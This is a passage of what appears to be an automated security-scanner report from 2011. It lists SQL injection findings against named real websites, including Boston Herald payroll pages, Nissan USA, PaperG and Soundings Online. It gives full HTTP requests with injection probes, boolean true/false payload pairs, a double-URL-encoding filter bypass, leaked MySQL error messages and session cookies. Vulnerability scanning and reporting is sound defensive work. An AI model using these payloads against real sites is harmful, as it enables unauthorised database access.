GET /projects/payroll/suffolk/?1'=1 HTTP/1.1 Host: www.bostonherald.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:35:03 GMT Server: Apache X-Powered-By: PHP/5.2.0-8+etch16 Content-Length: 319 Content-Type: text/html; charset=UTF-8 Connection: close
SQL: SELECT a.* FROM `suffolkData` a WHERE 1=1 ORDER BY ?1'=1 LIMIT 0,20
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?1'=1 LIMIT 0,20' at line 1<br> ...[SNIP]...
1.37. http://www.bostonherald.com/projects/payroll/worcester/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.bostonherald.com
Path:
/projects/payroll/worcester/
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /projects/payroll/worcester/?1'=1 HTTP/1.1 Host: www.bostonherald.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:42:21 GMT Server: Apache X-Powered-By: PHP/5.2.0-8+etch16 Content-Length: 323 Content-Type: text/html; charset=UTF-8 Connection: close
SQL: SELECT a.* FROM `worcesterData` a WHERE 1=1 ORDER BY ?1'=1 LIMIT 0,20
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?1'=1 LIMIT 0,20' at line 1<br> ...[SNIP]...
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /main/do'%20and%201%3d1--%20/Terms_of_Use HTTP/1.1 Host: www.dominionenterprises.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<script language="javascript" type="text/javascript"> var IsIPad = false; function QueryStringIsRequestFromMobile(DirectToFullSite) { Queries = window.location.search.substring(1); if (Queries == "" || Queries == null) { return false; } else { QueryArray = Queries.split("&"); for (i = 0; i < QueryArray.length; i++) { QueryValue = QueryArray[i].split("="); if (QueryValue[0] == DirectToFullSite) { if (QueryValue[1] == "fs24lmj09") return true; else return fa ...[SNIP]...
Request 2
GET /main/do'%20and%201%3d2--%20/Terms_of_Use HTTP/1.1 Host: www.dominionenterprises.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<script language="javascript" type="text/javascript"> var IsIPad = false; function QueryStringIsRequestFromMobile(DirectToFullSite) { Queries = window.location.search.substring(1); if (Queries == "" || Queries == null) { return false; } else { QueryArray = Queries.split("&"); for (i = 0; i < QueryArray.length; i++) { QueryValue = QueryArray[i].split("="); if (QueryValue[0] == DirectToFullSite) { if (QueryValue[1] == "fs24lmj09") return true; else return false; } else
...[SNIP]...
1.39. http://www.nissanusa.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://www.nissanusa.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /?1%2527=1 HTTP/1.1 Host: www.nissanusa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1 (redirected)
HTTP/1.1 200 OK Server: Apache/2.2.11 (Unix) Communique/4.0.4 mod_ssl/2.2.11 OpenSSL/0.9.7d Content-Type: text/html;charset=UTF-8 Date: Sat, 29 Jan 2011 04:37:07 GMT Connection: close Connection: Transfer-Encoding Content-Length: 66631
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html>
<head>
<meta http-equiv="Content-type" content="text/html; charset=UTF-8" /> <t ...[SNIP]... <span>See How They Stack Up</span> ...[SNIP]...
Request 2
GET /?1%2527%2527=1 HTTP/1.1 Host: www.nissanusa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Server: Apache/2.2.11 (Unix) Communique/4.0.4 mod_ssl/2.2.11 OpenSSL/0.9.7d Content-Type: text/html;charset=UTF-8 Date: Sat, 29 Jan 2011 04:37:14 GMT Connection: close Connection: Transfer-Encoding Content-Length: 66631
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html>
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 70060861%20or%201%3d1--%20 and 70060861%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /flyerboard/soundings-publications-llc/212370060861%20or%201%3d1--%20/0.html HTTP/1.1 Host: www.paperg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=7vd5ghvii8jml9e7v9p6kn1gt1;
<!-- START: SET 1 --> <div id="set1"> NY Daily News Flyerboard </div> <!-- END: SET 1 -->
<!-- START: CONTENT --> <div id="content">
<div style="text-align: center; margin: 10px;">
<s ...[SNIP]...
Request 2
GET /flyerboard/soundings-publications-llc/212370060861%20or%201%3d2--%20/0.html HTTP/1.1 Host: www.paperg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=7vd5ghvii8jml9e7v9p6kn1gt1;
The bid parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the bid parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /post.php?bid=2123%20and%201%3d1--%20&pid=3922&post HTTP/1.1 Host: www.paperg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=7vd5ghvii8jml9e7v9p6kn1gt1;
Response 1
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 17:17:50 GMT Server: Apache X-Powered-By: PHP/5.2.17 P3P: CP="CAO PSA OUR" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <title>PaperG | Post a Flyer</title>
<meta http-equiv="Content-Type" co ...[SNIP]... <script type="text/javascript" src="https://www.paperg.com/jsfb/embed.php?rand=84590&view=pre&height=200&width=200"></script>
</div> <br /><br />
<div class="clear"></div>
<div align="center" > <br /> <div id="lowest_cost_left_col"> <h3>INTRODUCTORY RATE As low as $50/week
</h3> </div> <div id="total_cost_left_col"> Total cost: <h2> <span id="estimated_cost_span" onmouseover="Tip('The cost automatically updates based on the publications you choose',WIDTH, 200)" onmouseout="UnTip();"> </span> <span id="estimated_cost_month_label" style="display:none;"><br />per month</span> </h2> </div>
<div id="total_length_left_col"> Total length: <h2><span id="time_span">0 days</span></h2> </div>
</div> <div id="multiboard_selected" align="center" style="display:none;"> *You will receive a discount for selecting multiple boards, which will be applied on the final confirmation screen. </div>
Having trouble posting? <a href="support.php">Email us</a> or call (203)889-3358 and press 0. You can also try <a onclick="verify_reset();">starting over</a>. <script type="text/javascript"> function verify_reset() { var answer = confirm("Are you sure you wish you start over? You will lose any information you have entered."); if (answer) { wind ...[SNIP]...
Request 2
GET /post.php?bid=2123%20and%201%3d2--%20&pid=3922&post HTTP/1.1 Host: www.paperg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=7vd5ghvii8jml9e7v9p6kn1gt1;
Response 2
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 17:17:50 GMT Server: Apache X-Powered-By: PHP/5.2.17 P3P: CP="CAO PSA OUR" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <title>PaperG | Post a Flyer</title>
<meta http-equiv="Content-Type" co ...[SNIP]... <script type="text/javascript" src="https://www.paperg.com/jsfb/embed.php?rand=56564&view=pre&height=200&width=200"></script>
</div> <br /><br />
<div class="clear"></div>
<div align="center" > <br /> <div id="lowest_cost_left_col"> <h3>INTRODUCTORY RATE As low as $50/week
</h3> </div> <div id="total_cost_left_col"> Total cost: <h2> <span id="estimated_cost_span" onmouseover="Tip('The cost automatically updates based on the publications you choose',WIDTH, 200)" onmouseout="UnTip();"> </span> <span id="estimated_cost_month_label" style="display:none;"><br />per month</span> </h2> </div>
<div id="total_length_left_col"> Total length: <h2><span id="time_span">0 days</span></h2> </div>
</div> <div id="multiboard_selected" align="center" style="display:none;"> *You will receive a discount for selecting multiple boards, which will be applied on the final confirmation screen. </div>
Having trouble posting? <a href="support.php">Email us</a> or call (203)889-3358 and press 0. You can also try <a onclick="verify_reset();">starting over</a>. <script type="text/javascript"> function verify_reset() { var answer = confirm("Are you sure you wish you start over? You will lose any information you have entered."); if (answer) { wind ...[SNIP]...
1.42. http://www.soundingsonline.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.soundingsonline.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /?1'=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 1
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:19:21 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:19:21 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font> ...[SNIP]...
Request 2
GET /?1''=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 2
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:19:34 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:19:34 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
...[SNIP]...
1.43. http://www.soundingsonline.com/about-us [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.soundingsonline.com
Path:
/about-us
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /about-us?1'=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 1
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:20:03 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:20:03 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font> ...[SNIP]...
Request 2
GET /about-us?1''=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 2
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:20:04 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:20:04 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
...[SNIP]...
1.44. http://www.soundingsonline.com/advertise [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.soundingsonline.com
Path:
/advertise
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /advertise?1'=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 1
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:18:34 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:18:34 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font> ...[SNIP]...
Request 2
GET /advertise?1''=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 2
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:18:36 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:18:36 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
...[SNIP]...
1.45. http://www.soundingsonline.com/archives [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.soundingsonline.com
Path:
/archives
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /archives?1'=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 1
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:18:26 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:18:26 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font> ...[SNIP]...
Request 2
GET /archives?1''=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 2
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:18:27 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:18:27 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
...[SNIP]...
1.46. http://www.soundingsonline.com/boat-shop [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.soundingsonline.com
Path:
/boat-shop
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /boat-shop?1'=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 1
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:20:00 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:20:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font> ...[SNIP]...
Request 2
GET /boat-shop?1''=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 2
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:20:09 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:20:09 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
...[SNIP]...
1.47. http://www.soundingsonline.com/boat-shop/know-how [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.soundingsonline.com
Path:
/boat-shop/know-how
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
